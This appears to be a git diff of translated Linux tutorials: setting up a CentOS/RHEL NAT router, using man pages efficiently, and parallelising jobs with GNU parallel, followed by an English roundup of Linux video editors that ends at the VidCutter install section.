我们需要为两个网卡都分配 IP 地址,一个本地网络的 IP(由我们的网络管理员提供),另一个是互联网 IP(由 ISP 提供)。 像这样:
|
||||
|
||||
```
|
||||
Ifcfg-en0s3 192.168.1.1 (LAN IP address)
|
||||
Ifcfg-en0s5 10.1.1.1 (WAN IP address)
|
||||
```
|
||||
|
||||
**注意** 不同 Linux 发行版的网卡名是不一样的。
|
||||
|
||||
现在准备工作完成了,可以进行配置了。
|
||||
|
||||
### 步骤 1 启用 IP 转发
|
||||
|
||||
第一步,我们启用 IP 转发。 这一步在 RHEL/CentOS 6 和 7 上是相同的。 运行
|
||||
|
||||
```
|
||||
$ sysctl -w net.ipv4.ip_forward=1
|
||||
```
|
||||
|
||||
但是这样会在系统重启后恢复。要让重启后依然生效需要打开
|
||||
|
||||
```
|
||||
$ vi /etc/sysctl.conf
|
||||
```
|
||||
|
||||
然后输入下面内容,
|
||||
|
||||
```
|
||||
net.ipv4.ip_forward = 1
|
||||
```
|
||||
|
||||
保存并退出。现在系统就启用 IP 转发了。
|
||||
|
||||
### 步骤 2 配置 IPtables/Firewalld 的规则
|
||||
|
||||
下一步我们需要启动 IPtables/firewalld 服务并配置 NAT 规则,
|
||||
|
||||
```
|
||||
$ systemctl start firewalld (For Centos/RHEL 7)
|
||||
$ service iptables start (For Centos/RHEL 6)
|
||||
```
|
||||
|
||||
然后运行下面命令来配置防火墙的 NAT 规则:
|
||||
|
||||
```
|
||||
CentOS/RHEL 6
|
||||
$ iptables -t nat -A POSTROUTING -o XXXX -j MASQUERADE
|
||||
$ service iptables restart
|
||||
CentOS/RHEL 7
|
||||
$ firewall-cmd --permanent --direct --passthrough ipv4 -t nat -I POSTROUTING -o XXXX -j MASQUERADE -s 192.168.1.0/24
|
||||
$ systemctl restart firewalld
|
||||
```
|
||||
这里,`XXXX` 是配置有外网 IP 的那个网卡名称。 这就将 Linux 机器配置成了路由器了, 下面我们就可以配置客户端然后测试路由器了。
|
||||
|
||||
### 步骤 3 配置客户端
|
||||
|
||||
要测试路由器,我们需要在客户端的网关设置成内网 IP, 本例中就是 192.168.1.1。 因此不管客户机是 Windows 还是 Linux, 请先确保网关是 192.168.1.1。 完成后, 打开终端或命令行并 `ping` 一个网站来测试客户端是否能访问互联网了:
|
||||
|
||||
```
|
||||
$ ping google.com
|
||||
```
|
||||
|
||||
我们也可以通过网络浏览器访问网站的方式来检查。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/turning-centosrhel-6-7-machine-router/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:https://www.facebook.com/linuxtechlab/
|
||||
[2]:https://twitter.com/LinuxTechLab
|
||||
[3]:https://plus.google.com/+linuxtechlab
|
181
published/20171215 Learn To Use Man Pages Efficiently.md
Normal file
181
published/20171215 Learn To Use Man Pages Efficiently.md
Normal file
@ -0,0 +1,181 @@
|
||||
学习如何高效地使用 man 页
|
||||
======
|
||||
|
||||
不久前,我们发布了一篇简短的指引,描述了如何轻易地[回忆起忘记的 Linux 命令][1]。那篇指引对于无法记住命令的人来说真的非常有用。今天,我们就来学习一下如何高效而又迅速地从 man 页中获取你所需要的信息。如你所知,一个标准的 man 页分成很多个部分,每部分都有一个独立的标题。当你想查看特定的标志/选项时,可能需要向下滚动很长时间才能找到。这是个效率低下而且很耗时间的过程。这也是为什么要学会高效使用 man 页来精确定位你想要的内容的原因。
|
||||
|
||||
在本文中,我会分享一些常用的跟 man 页相关的重要技巧。
|
||||
|
||||
### 学习高效地使用 Man 页
|
||||
|
||||
#### 基础用法
|
||||
|
||||
我们都知道,我们可以使用类似下面的命令来打开关于某个命令(比如 `mkdir`)的 man 页:
|
||||
|
||||
```
|
||||
man mkdir
|
||||
```
|
||||
|
||||
可以使用 `空格`、`d`、`b` 以及上下箭头等来浏览 man 页。要跳转到 man 页的末尾,可以按 `End` 键,而想跳转到 man 页的头部则可以按 `Home` 键。在当前打开的 man 页中按下 `h` 键会显示所有有用的键盘快捷键和一般用法。(LCTT 译注:这些快捷键其实是 man 所使用的 less 分页器的快捷键)
|
||||
|
||||
![][3]
|
||||
|
||||
按 `q` 可以退出 man 页。
|
||||
|
||||
#### 回忆起忘记的命令
|
||||
|
||||
对于那些不知道想要哪个命令的家伙,可以去查看一下我第一段中提到的那个链接。使用 man 页我们也能做到这一点。假设说,你想要创建一个目录,而你忘记了使用哪个命令来创建目录。
|
||||
|
||||
为了回忆起那个忘记的命令,可以将 man 和 `grep` 命令联用:
|
||||
|
||||
```
|
||||
man -k directory | grep create
|
||||
```
|
||||
|
||||
输出结果为:
|
||||
|
||||
```
|
||||
CURLOPT_NEW_DIRECTORY_PERMS (3) - permissions for remotely created directories
|
||||
libssh2_sftp_mkdir_ex (3) - create a directory on the remote file system
|
||||
mkdir (2) - create a directory
|
||||
mkdirat (2) - create a directory
|
||||
mkdtemp (3) - create a unique temporary directory
|
||||
mkdtemp (3p) - create a unique directory or file
|
||||
mkfontdir (1) - create an index of X font files in a directory
|
||||
mklost+found (8) - create a lost+found directory on a mounted Linux second extended file。。。
|
||||
mkstemp (3p) - create a unique directory
|
||||
mktemp (1) - create a temporary file or directory
|
||||
pam_mkhomedir (8) - PAM module to create users home directory
|
||||
```
|
||||
|
||||
![][4]
|
||||
|
||||
你只需要阅读一下每个命令的描述,然后挑选出合适的命令就行了。啊,现在你记起来了。`mkdir` 正是你想要的,对吧?就是那么简单。
|
||||
|
||||
#### 在 man 页中搜索
|
||||
|
||||
若你在 man 页中想要查找特定字符串。只需要输入 `/` (前斜线)再加上你想要搜索的字符串,像这样:
|
||||
|
||||
```
|
||||
/<search_string> 或 <pattern>
|
||||
```
|
||||
|
||||
假设你正在查看 `mount` 命令的 man 页,想要寻找关于 `-bind` 选项的相关信息。可以输入:
|
||||
|
||||
```
|
||||
/bind
|
||||
```
|
||||
|
||||
![][5]
|
||||
|
||||
当前 man 页中任何匹配搜索字符串的内容都会被高亮显示。
|
||||
|
||||
![][6]
|
||||
|
||||
按下 `n` 和 `SHIFT+n` 来查看下一个/上一个匹配的地方。
|
||||
|
||||
`/` 模式(或者说字符串)会向前搜索匹配行。你也可以使用 `?` 模式进行向后搜索。这当你在 man 页的末尾或中间位置时非常有用。
|
||||
|
||||
```
|
||||
?bind
|
||||
```
|
||||
|
||||
若想只显示匹配行,输入:
|
||||
|
||||
```
|
||||
&bind
|
||||
```
|
||||
|
||||
![][7]
|
||||
|
||||
使用这种方法,你无需使用 `n` 和 `SHIFT+n` 来滚动到下一个/上一个匹配的位置。`&` 模式只会显示那些包含搜索内容的行,其他的内容全都被省略掉。
|
||||
|
||||
#### 不打开 man 页而进行搜索
|
||||
|
||||
也可以在不打开 man 页的前提下搜索指定选项的信息。
|
||||
|
||||
比如,你想了解 `mkdir` 命令中的 `-m` 选项的相关信息。可以运行:
|
||||
|
||||
```
|
||||
man mkdir | grep -e '-m'
|
||||
```
|
||||
|
||||
或者,
|
||||
|
||||
```
|
||||
man mkdir | grep -- '-m'
|
||||
```
|
||||
|
||||
![][8]
|
||||
|
||||
这个命令会显示出 `mkdir` 命令 man 页中第一次出现 `-m` 时的内容。从上面命令中我们可以看到 `-m` 表示的是 “MODE”(`chmod`)。
|
||||
|
||||
如果你想阅读 `mkdir` 命令的完整 man 页,但是要跳过第一次出现 `-m` 之前的内容,可以使用下面命令:
|
||||
|
||||
```
|
||||
man mkdir | less +/-m
|
||||
```
|
||||
|
||||
![][9]
|
||||
|
||||
这是另一个例子:
|
||||
|
||||
```
|
||||
man mount | less +/--bind
|
||||
```
|
||||
|
||||
![][10]
|
||||
|
||||
按下 `n` 或 `SHIFT+n` 可以浏览下一个/上一个匹配的位置。
|
||||
|
||||
参考阅读:[每个 Linux 用户都应该知道的 3 个 man 页替代品][11]。
|
||||
|
||||
#### 将完整的 man 页导出到文本文件中
|
||||
|
||||
我们可以将指定命令的完整 man 页导出成文本文件。方法是运行下面命令:
|
||||
|
||||
```
|
||||
man mount > mount.txt
|
||||
```
|
||||
|
||||
该命令会将 `mount` 命令的 man 页导出到当前目录的 `mount.txt` 文件中。
|
||||
|
||||
也可以获取一个简化版的 man 页,没有退格和下划线,方法是使用下面命令。
|
||||
|
||||
```
|
||||
man mount | col -b > mount.txt
|
||||
```
|
||||
|
||||
要了解更多关于 man 页的详细信息,运行:
|
||||
|
||||
```
|
||||
man man
|
||||
```
|
||||
|
||||
该命令会显示出关于 man 的 man 页。这些技巧都很基础但很实用。它们会节省你很多的时间而且能免去很多的滚动操作。
|
||||
|
||||
今天的内容就到这了。希望对你有帮助。更多好文即将到来。准备好哦!
|
||||
|
||||
Cheers!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.ostechnix.com/learn-use-man-pages-efficiently/
|
||||
|
||||
作者:[SK][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.ostechnix.com/author/sk/
|
||||
[1]:https://www.ostechnix.com/easily-recall-forgotten-linux-commands/
|
||||
[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
|
||||
[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-4.png
|
||||
[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-3.png
|
||||
[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-5.png
|
||||
[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-6.png
|
||||
[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-8.png
|
||||
[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-1.png
|
||||
[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-2-1.png
|
||||
[10]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-7.png
|
||||
[11]:https://www.ostechnix.com/3-good-alternatives-man-pages-every-linux-user-know/
|
@ -0,0 +1,104 @@
|
||||
使用 parallel 利用起你的所有 CPU 资源
|
||||
======
|
||||
|
||||
bash 命令通常单线程运行。这意味着所有的处理工作只在单个 CPU 上执行。随着 CPU 规模的扩大以及核心数目的增加,这意味着只有一小部分的 CPU 资源用于处理你的工作。
|
||||
|
||||
当我们的工作受制于 CPU 处理数据的速度时,这些未使用的 CPU 资源能产生很大的效用。这种情况在进行多媒体转换(比如图片和视频转换)以及数据压缩中经常遇到。
|
||||
|
||||
本文中,我们将会使用 [parallel][1] 程序。parallel 会接受一个列表作为输入,然后在所有 CPU 核上并行地执行命令来处理该列表。Parallel 甚至会按顺序将结果输出到标准输出中,因此它可以用在管道中作为其他命令的标准输入。
|
||||
|
||||
### 如何使用 parallel
|
||||
|
||||
parallel 在标准输入中读取一个列表作为输入,然后创建多个指定命令的进程来处理这个列表,其格式为:
|
||||
|
||||
```
|
||||
list | parallel command
|
||||
```
|
||||
|
||||
这里的 list 可以由任何常见的 bash 命令创建,例如:`cat`、`grep`、`find`。这些命令的结果通过管道从它们的标准输出传递到 parallel 的标准输入,像这样:
|
||||
|
||||
```
|
||||
find . -type f -name "*.log" | parallel
|
||||
```
|
||||
|
||||
跟 `find` 中使用 `-exec` 类似,`parallel` 使用 `{}` 来表示输入列表中的每个元素。下面这个例子中,`parallel` 会使用 `gzip` 压缩所有 `find` 命令输出的文件:
|
||||
|
||||
```
|
||||
find . -type f -name "*.log" | parallel gzip {}
|
||||
```
|
||||
|
||||
下面这些实际的使用 `parallel` 的例子可能会更容易理解一些。
|
||||
|
||||
### 使用 parallel 来进行 JPEG 压缩
|
||||
|
||||
在这个例子中,我收集了一些比较大的 `.jpg` 文件(大约 10MB 大小),要用 [Mozilla][3] 出品的 JPEG 图像压缩工具 [MozJPEG][2] 来进行处理。该工具会在尝试保持图像质量的同时减少 JPEG 图像文件的大小。这对降低网页加载时间很重要。
|
||||
|
||||
下面是一个普通的 `find` 命令,用来找出当前目录中的所有 `.jpg` 文件,然后通过 MozJPEG 包中提供的图像压缩工具 (`cjpeg`) 对其进行处理:
|
||||
|
||||
```
|
||||
find . -type f -name "*.jpg" -exec cjpeg -outfile LoRes/{} {} ';'
|
||||
```
|
||||
|
||||
总共耗时 `0m44.114s`。该命令运行时的 `top` 看起来是这样的:
|
||||
|
||||
![][4]
|
||||
|
||||
你可以看到,虽然有 8 个核可用,但实际只有单个线程在用单个核。
|
||||
|
||||
下面用 `parallel` 来运行相同的命令:
|
||||
|
||||
```
|
||||
find . -type f -name "*.jpg" | parallel cjpeg -outfile LoRes/{} {}
|
||||
```
|
||||
|
||||
这次压缩所有图像的时间缩减到了 `0m10.814s`。从 `top` 显示中可以很清楚地看出不同:
|
||||
|
||||
![][5]
|
||||
|
||||
所有 CPU 核都满负荷运行,有 8 个线程对应使用 8 个 CPU 核。
|
||||
|
||||
### parallel 与 gzip 连用
|
||||
|
||||
如果你需要压缩多个文件而不是一个大文件,那么 `parallel` 就能用来提高处理速度。如果你需要压缩单个文件而同时又想要利用所有的 CPU 核的话,那么你应该使用 `gzip` 的多线程替代品 [pigz][6]。
|
||||
|
||||
首先,我用随机数据创建了 100 个大约 10MB 的文件:
|
||||
|
||||
```
|
||||
for i in {1..100}; do dd if=/dev/urandom of=file-$i bs=1MB count=10; done
|
||||
```
|
||||
|
||||
然后我用 `find -exec` 命令来进行压缩:
|
||||
|
||||
```
|
||||
find . -type f -name "file*" -exec gzip {} ';'
|
||||
```
|
||||
|
||||
总共耗时 `0m28.028s`,而且也是只利用了单核。
|
||||
|
||||
换成 `parallel` 版本:
|
||||
|
||||
```
|
||||
find . -type f -name "file*" | parallel gzip {}
|
||||
```
|
||||
|
||||
耗时减少到了 `0m5.774s`。
|
||||
|
||||
parallel 是一款非常好用的工具,应该加入到你的系统管理工具包中,在合适的场合它能帮你节省大量的时间。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://bash-prompt.net/guides/parallell-bash/
|
||||
|
||||
作者:[Elliot Cooper][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://bash-prompt.net/about
|
||||
[1]:https://www.gnu.org/software/parallel/
|
||||
[2]:https://github.com/mozilla/mozjpeg
|
||||
[3]:https://www.mozilla.org/
|
||||
[4]:https://bash-prompt.net/images/guides/parallell-bash/top-single-core-100.png
|
||||
[5]:https://bash-prompt.net/images/guides/parallell-bash/top-all-cores-100.png
|
||||
[6]:https://zlib.net/pigz/
|
@ -0,0 +1,514 @@
|
||||
9 Best Free Video Editing Software for Linux In 2017
|
||||
======
|
||||
**Brief: Here are best video editors for Linux, their feature, pros and cons and how to install them on your Linux distributions.**
|
||||
|
||||
![Best Video editors for Linux][1]
|
||||
|
||||
![Best Video editors for Linux][2]
|
||||
|
||||
We have discussed [best photo management applications for Linux][3], [best code editors for Linux][4] in similar articles in the past. Today we shall see the **best video editing software for Linux**.
|
||||
|
||||
When asked about free video editing software, Windows Movie Maker and iMovie is what most people often suggest.
|
||||
|
||||
Unfortunately, both of them are not available for GNU/Linux. But you don't need to worry about it, we have pooled together a list of **best free video editors** for you.
|
||||
|
||||
## Best Video Editors for Linux
|
||||
|
||||
Let's have a look at the best free video editing software for Linux below. Here's a quick summary if you think the article is too long to read. You can click on the links to jump to the relevant section of the article:
|
||||
|
||||
| Video Editors | Main Usage | Type |
|---|---|---|
| Kdenlive | General purpose video editing | Free and Open Source |
| OpenShot | General purpose video editing | Free and Open Source |
| Shotcut | General purpose video editing | Free and Open Source |
| Flowblade | General purpose video editing | Free and Open Source |
| Lightworks | Professional grade video editing | Freemium |
| Blender | Professional grade 3D editing | Free and Open Source |
| Cinelerra | General purpose video editing | Free and Open Source |
| DaVinci Resolve | Professional grade video editing | Freemium |
| VidCutter | Simple video split and merge | Free and Open Source |
|
||||
|
||||
### 1\. Kdenlive
|
||||
|
||||
![Kdenlive-free video editor on ubuntu][1]
|
||||
|
||||
![Kdenlive-free video editor on ubuntu][5]
|
||||
[Kdenlive][6] is a free and [open source][7] video editing software from [KDE][8] that provides support for dual video monitors, a multi-track timeline, clip list, customizable layout support, basic effects, and basic transitions.
|
||||
|
||||
It supports a wide variety of file formats and a wide range of camcorders and cameras including Low resolution camcorder (Raw and AVI DV editing), Mpeg2, mpeg4 and h264 AVCHD (small cameras and camcorders), High resolution camcorder files, including HDV and AVCHD camcorders, Professional camcorders, including XDCAM-HD™ streams, IMX™ (D10) streams, DVCAM (D10) , DVCAM, DVCPRO™, DVCPRO50™ streams and DNxHD™ streams.
|
||||
|
||||
If you are looking for an iMovie alternative for Linux, Kdenlive would be your best bet.
|
||||
|
||||
#### Kdenlive features
|
||||
|
||||
* Multi-track video editing
|
||||
* A wide range of audio and video formats
|
||||
* Configurable interface and shortcuts
|
||||
* Easily create tiles using text or images
|
||||
* Plenty of effects and transitions
|
||||
* Audio and video scopes make sure the footage is correctly balanced
|
||||
* Proxy editing
|
||||
* Automatic save
|
||||
* Wide hardware support
|
||||
* Keyframeable effects
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* All-purpose video editor
|
||||
* Not too complicated for those who are familiar with video editing
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* It may still be confusing if you are looking for something extremely simple
|
||||
* KDE applications are infamous for being bloated
|
||||
|
||||
|
||||
|
||||
#### Installing Kdenlive
|
||||
|
||||
Kdenlive is available for all major Linux distributions. You can simply search for it in your software center. Various packages are available in the [download section of Kdenlive website][9].
|
||||
|
||||
Command line enthusiasts can install it from the terminal by running the following command in Debian and Ubuntu-based Linux distributions:
|
||||
```
|
||||
sudo apt install kdenlive
|
||||
```
|
||||
|
||||
### 2\. OpenShot
|
||||
|
||||
![Openshot-free-video-editor-on-ubuntu][1]
|
||||
|
||||
![Openshot-free-video-editor-on-ubuntu][10]
|
||||
|
||||
[OpenShot][11] is another multi-purpose video editor for Linux. OpenShot can help you create videos with transitions and effects. You can also adjust audio levels. Of course, it supports most formats and codecs.
|
||||
|
||||
You can also export your film to DVD, upload to YouTube, Vimeo, Xbox 360, and many common video formats. OpenShot is a tad bit simpler than Kdenlive. So if you need a video editor with a simple UI OpenShot is a good choice.
|
||||
|
||||
There is also a neat documentation to [get you started with OpenShot][12].
|
||||
|
||||
#### OpenShot features
|
||||
|
||||
* Cross-platform, available on Linux, macOS, and Windows
|
||||
* Support for a wide range of video, audio, and image formats
|
||||
* Powerful curve-based Keyframe animations
|
||||
* Desktop integration with drag and drop support
|
||||
* Unlimited tracks or layers
|
||||
* Clip resizing, scaling, trimming, snapping, rotation, and cutting
|
||||
* Video transitions with real-time previews
|
||||
* Compositing, image overlays and watermarks
|
||||
* Title templates, title creation, sub-titles
|
||||
* Support for 2D animation via image sequences
|
||||
* 3D animated titles and effects
|
||||
* SVG friendly for creating and including vector titles and credits
|
||||
* Scrolling motion picture credits
|
||||
* Frame accuracy (step through each frame of video)
|
||||
* Time-mapping and speed changes on clips
|
||||
* Audio mixing and editing
|
||||
* Digital video effects, including brightness, gamma, hue, greyscale, chroma key etc
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* All-purpose video editor for average video editing needs
|
||||
* Available on Windows and macOS along with Linux
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* It may be simple but if you are extremely new to video editing, there is definitely a learning curve involved here
|
||||
* You may still find it falls short of professional-grade, movie-making editing software
|
||||
|
||||
|
||||
|
||||
#### Installing OpenShot
|
||||
|
||||
OpenShot is also available in the repository of all major Linux distributions. You can simply search for it in your software center. You can also get it from its [official website][13].
|
||||
|
||||
My favorite way is to use the following command in Debian and Ubuntu-based Linux distributions:
|
||||
```
|
||||
sudo apt install openshot
|
||||
```
|
||||
|
||||
### 3\. Shotcut
|
||||
|
||||
![Shotcut Linux video editor][1]
|
||||
|
||||
![Shotcut Linux video editor][14]
|
||||
|
||||
[Shotcut][15] is another video editor for Linux that can be put in the same league as Kdenlive and OpenShot. While it does provide similar features as the other two discussed above, Shotcut is a bit advanced with support for 4K videos.
|
||||
|
||||
Support for a number of audio, video format, transitions and effects are some of the numerous features of Shotcut. External monitor is also supported here.
|
||||
|
||||
There is a collection of video tutorials to [get you started with Shotcut][16]. It is also available for Windows and macOS so you can use your learning on other operating systems as well.
|
||||
|
||||
#### Shotcut features
|
||||
|
||||
* Cross-platform, available on Linux, macOS, and Windows
|
||||
* Support for a wide range of video, audio, and image formats
|
||||
* Native timeline editing
|
||||
* Mix and match resolutions and frame rates within a project
|
||||
* Audio filters, mixing and effects
|
||||
* Video transitions and filters
|
||||
* Multitrack timeline with thumbnails and waveforms
|
||||
* Unlimited undo and redo for playlist edits including a history view
|
||||
* Clip resizing, scaling, trimming, snapping, rotation, and cutting
|
||||
* Trimming on source clip player or timeline with ripple option
|
||||
* External monitoring on an extra system display/monitor
|
||||
* Hardware support
|
||||
|
||||
|
||||
|
||||
You can read about more features [here][17].
|
||||
|
||||
#### Pros
|
||||
|
||||
* All-purpose video editor for common video editing needs
|
||||
* Support for 4K videos
|
||||
* Available on Windows and macOS along with Linux
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Too many features reduce the simplicity of the software
|
||||
|
||||
|
||||
|
||||
#### Installing Shotcut
|
||||
|
||||
Shotcut is available in [Snap][18] format. You can find it in Ubuntu Software Center. For other distributions, you can get the executable file from its [download page][19].
|
||||
|
||||
### 4\. Flowblade
|
||||
|
||||
![Flowblade movie editor on ubuntu][1]
|
||||
|
||||
![Flowblade movie editor on ubuntu][20]
|
||||
|
||||
[Flowblade][21] is a multitrack non-linear video editor for Linux. Like the above-discussed ones, this too is a free and open source software. It comes with a stylish and modern user interface.
|
||||
|
||||
Written in Python, it is designed to provide a fast and precise editing experience. Flowblade has focused on providing the best possible experience on Linux and other free platforms. So there's no Windows and OS X version for now. Feels good to be a Linux exclusive.
|
||||
|
||||
You also get a decent [documentation][22] to help you use all of its features.
|
||||
|
||||
#### Flowblade features
|
||||
|
||||
* Lightweight application
|
||||
* Provide simple interface for simple tasks like split, merge, overwrite etc
|
||||
* Plenty of audio and video effects and filters
|
||||
* Supports [proxy editing][23]
|
||||
* Drag and drop support
|
||||
* Support for a wide range of video, audio, and image formats
|
||||
* Batch rendering
|
||||
* Watermarks
|
||||
* Video transitions and filters
|
||||
* Multitrack timeline with thumbnails and waveforms
|
||||
|
||||
|
||||
|
||||
You can read about more [Flowblade features][24] here.
|
||||
|
||||
#### Pros
|
||||
|
||||
* Lightweight
|
||||
* Good for general purpose video editing
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Not available on other platforms
|
||||
|
||||
|
||||
|
||||
#### Installing Flowblade
|
||||
|
||||
Flowblade should be available in the repositories of all major Linux distributions. You can install it from the software center. More information is available on its [download page][25].
|
||||
|
||||
Alternatively, you can install Flowblade in Ubuntu and other Ubuntu based systems, using the command below:
|
||||
```
|
||||
sudo apt install flowblade
|
||||
```
|
||||
|
||||
### 5\. Lightworks
|
||||
|
||||
![Lightworks running on ubuntu 16.04][1]
|
||||
|
||||
![Lightworks running on ubuntu 16.04][26]
|
||||
|
||||
If you are looking for video editor software that has more features, this is the answer. [Lightworks][27] is a cross-platform professional video editor, available for Linux, Mac OS X and Windows.
|
||||
|
||||
It is an award-winning professional [non-linear editing][28] (NLE) software that supports resolutions up to 4K as well as video in SD and HD formats.
|
||||
|
||||
Lightworks is available for Linux, however, it is not open source.
|
||||
|
||||
This application has two versions:
|
||||
|
||||
* Lightworks Free
|
||||
* Lightworks Pro
|
||||
|
||||
|
||||
|
||||
Pro version has more features such as higher resolution support, 4K and Blu-ray support etc.
|
||||
|
||||
Extensive documentation is available on its [website][29]. You can also refer to videos at [Lightworks video tutorials page][30]
|
||||
|
||||
#### Lightworks features
|
||||
|
||||
* Cross-platform
|
||||
* Simple & intuitive User Interface
|
||||
* Easy timeline editing & trimming
|
||||
* Real-time ready to use audio & video FX
|
||||
* Access amazing royalty-free audio & video content
|
||||
* Lo-Res Proxy workflows for 4K
|
||||
* Export video for YouTube/Vimeo, SD/HD, up to 4K
|
||||
* Drag and drop support
|
||||
* Wide variety of audio and video effects and filters
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* Professional, feature-rich video editor
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Limited free version
|
||||
|
||||
|
||||
|
||||
#### Installing Lightworks
|
||||
|
||||
Lightworks provides DEB packages for Debian and Ubuntu-based Linux distributions and RPM packages for Fedora-based Linux distributions. You can find the packages on its [download page][31].
|
||||
|
||||
### 6\. Blender
|
||||
|
||||
![Blender running on Ubuntu 16.04][1]
|
||||
|
||||
![Blender running on Ubuntu 16.04][32]
|
||||
|
||||
[Blender][33] is a professional, industry-grade open source, cross-platform video editor. It is popular for 3D works. Blender has been used in several Hollywood movies including Spider Man series.
|
||||
|
||||
Although originally designed for 3D modeling, it can also be used for video editing, with input capabilities for a variety of formats.
|
||||
|
||||
#### Blender features
|
||||
|
||||
* Live preview, luma waveform, chroma vectorscope and histogram displays
|
||||
* Audio mixing, syncing, scrubbing and waveform visualization
|
||||
* Up to 32 slots for adding video, images, audio, scenes, masks and effects
|
||||
* Speed control, adjustment layers, transitions, keyframes, filters and more
|
||||
|
||||
|
||||
|
||||
You can read about more features [here][34].
|
||||
|
||||
#### Pros
|
||||
|
||||
* Cross-platform
|
||||
* Professional grade editing
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Complicated
|
||||
* Mainly for 3D animation, not focused on regular video editing
|
||||
|
||||
|
||||
|
||||
#### Installing Blender
|
||||
|
||||
The latest version of Blender can be downloaded from its [download page][35].
|
||||
|
||||
### 7\. Cinelerra
|
||||
|
||||
![Cinelerra video editor for Linux][1]
|
||||
|
||||
![Cinelerra video editor for Linux][36]
|
||||
|
||||
[Cinelerra][37] has been available since 1998 and has been downloaded over 5 million times. It was the first video editor to provide non-linear editing on 64-bit systems back in 2003. It was a go-to video editor for Linux users at that time but it lost its sheen afterward as some developers abandoned the project.
|
||||
|
||||
Good thing is that it's back on track and is being developed actively again.
|
||||
|
||||
There is some [interesting backdrop story][38] about how and why Cinelerra was started if you care to read.
|
||||
|
||||
#### Cinelerra features
|
||||
|
||||
* Non-linear editing
|
||||
* Support for HD videos
|
||||
* Built-in frame renderer
|
||||
* Various video effects
|
||||
* Unlimited layers
|
||||
* Split pane editing
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* All-purpose video editor
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Not suitable for beginners
|
||||
* No packages available
|
||||
|
||||
|
||||
|
||||
#### Installing Cinelerra
|
||||
|
||||
You can download the source code from [SourceForge][39]. More information on its [download page][40].
|
||||
|
||||
### 8\. DaVinci Resolve
|
||||
|
||||
![DaVinci Resolve video editor][1]
|
||||
|
||||
![DaVinci Resolve video editor][41]
|
||||
|
||||
If you want Hollywood level video editing, use the tool the professionals use in Hollywood. [DaVinci Resolve][42] from Blackmagic is what professionals are using for editing movies and tv shows.
|
||||
|
||||
DaVinci Resolve is not your regular video editor. It's a full-fledged editing tool that provides editing, color correction and professional audio post-production in a single application.
|
||||
|
||||
DaVinci Resolve is not open source. Like LightWorks, it too provides a free version for Linux. The pro version costs $300.
|
||||
|
||||
#### DaVinci Resolve features
|
||||
|
||||
* High-performance playback engine
|
||||
* All kind of edit types such as overwrite, insert, ripple overwrite, replace, fit to fill, append at end
|
||||
* Advanced Trimming
|
||||
* Audio Overlays
|
||||
* Multicam Editing allows editing footage from multiple cameras in real-time
|
||||
* Transition and filter-effects
|
||||
* Speed effects
|
||||
* Timeline curve editor
|
||||
* Non-linear editing for VFX
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* Cross-platform
|
||||
* Professional grade video editor
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Not suitable for average editing
|
||||
* Not open source
|
||||
* Some features are not available in the free version
|
||||
|
||||
|
||||
|
||||
#### Installing DaVinci Resolve
|
||||
|
||||
You can download DaVinci Resolve for Linux from [its website][42]. You'll have to register, even for the free version.
|
||||
|
||||
### 9\. VidCutter
|
||||
|
||||
![VidCutter video editor for Linux][1]
|
||||
|
||||
![VidCutter video editor for Linux][43]
|
||||
|
||||
Unlike all the other video editors discussed here, [VidCutter][44] is utterly simple. It doesn't do much except splitting videos and merging. But at times you just need this and VidCutter gives you just that.
|
||||
|
||||
#### VidCutter features
|
||||
|
||||
* Cross-platform app available for Linux, Windows and MacOS
|
||||
* Supports most of the common video formats such as: AVI, MP4, MPEG 1/2, WMV, MP3, MOV, 3GP, FLV etc
|
||||
* Simple interface
|
||||
* Trims and merges the videos, nothing more than that
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* Cross-platform
|
||||
* Good for simple split and merge
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Not suitable for regular video editing
|
||||
* Crashes often
|
||||
|
||||
|
||||
|
||||
#### Installing VidCutter
|
||||
|
||||
